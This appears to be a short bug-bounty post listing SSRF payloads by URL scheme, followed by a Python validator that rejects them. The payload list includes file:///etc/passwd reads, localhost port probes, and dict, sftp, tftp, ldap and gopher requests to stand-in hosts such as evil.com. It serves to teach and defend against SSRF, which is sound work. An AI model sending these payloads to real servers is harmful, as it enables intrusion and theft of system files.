SSRF exploitation via URL Scheme

1-File: Allows an attacker to fetch the content of a file on the server

file://path/to/file
file:///etc/passwd
file://\/\/etc/passwd
ssrf.php?url=file:///etc/passwd

2-HTTP: Allows an attacker to fetch any content from the web; it can also be used to scan ports

ssrf.php?url=http://127.0.0.1:22
ssrf.php?url=http://127.0.0.1:80
ssrf.php?url=http://127.0.0.1:443

3-Dict: DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/

4-SFTP: A network protocol used for secure file transfer over secure shell

ssrf.php?url=sftp://evil.com:11111/

5-TFTP: Trivial File Transfer Protocol, works over UDP

ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

6-LDAP: It is an application protocol used over an IP network to manage and access the distributed directory information service

ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

7-Gopher HTTP

gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A

gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
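
A server-side check that rejects the url= values listed above before any fetch is made, as an added example (not code from the original post). `check_url`, `ALLOWED_SCHEMES` and `SAMPLES` are hypothetical names, and the http/https-only allowlist is an assumption about what the fetching feature needs.

```python
import ipaddress
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the feature only fetches web pages

# url= parameter values taken from the examples on this page
SAMPLES = [
    "file:///etc/passwd",
    "http://127.0.0.1:22",
    "dict://attacker:11111/",
    "sftp://evil.com:11111/",
    "tftp://evil.com:12346/TESTUDPPACKET",
    "ldap://localhost:11211/%0astats%0aquit",
]

def check_url(url):
    """Return (allowed, reason) for a user-supplied URL before the server fetches it."""
    # Encoded CR/LF (%0a, %0d) carries extra protocol lines in the ldap/gopher payloads.
    if any(c in unquote(url) for c in "\r\n"):
        return False, "control characters in URL"
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False, "unparseable URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme '{scheme}' not allowed"
    if not host:
        return False, "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "internal host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname, not an IP literal. This offline check stops here; a real
        # deployment must also resolve the name and apply the same address test
        # to the IP the HTTP client actually connects to.
        return True, "ok"
    if not ip.is_global:  # loopback, private, link-local, reserved ranges
        return False, f"non-public address {ip}"
    return True, "ok"

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", check_url(sample))
```

The HTTP client behind the check should also have redirects disabled or re-validated, since a redirect target never passes through `check_url`.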

#SSRF #exploitation #BugBounty
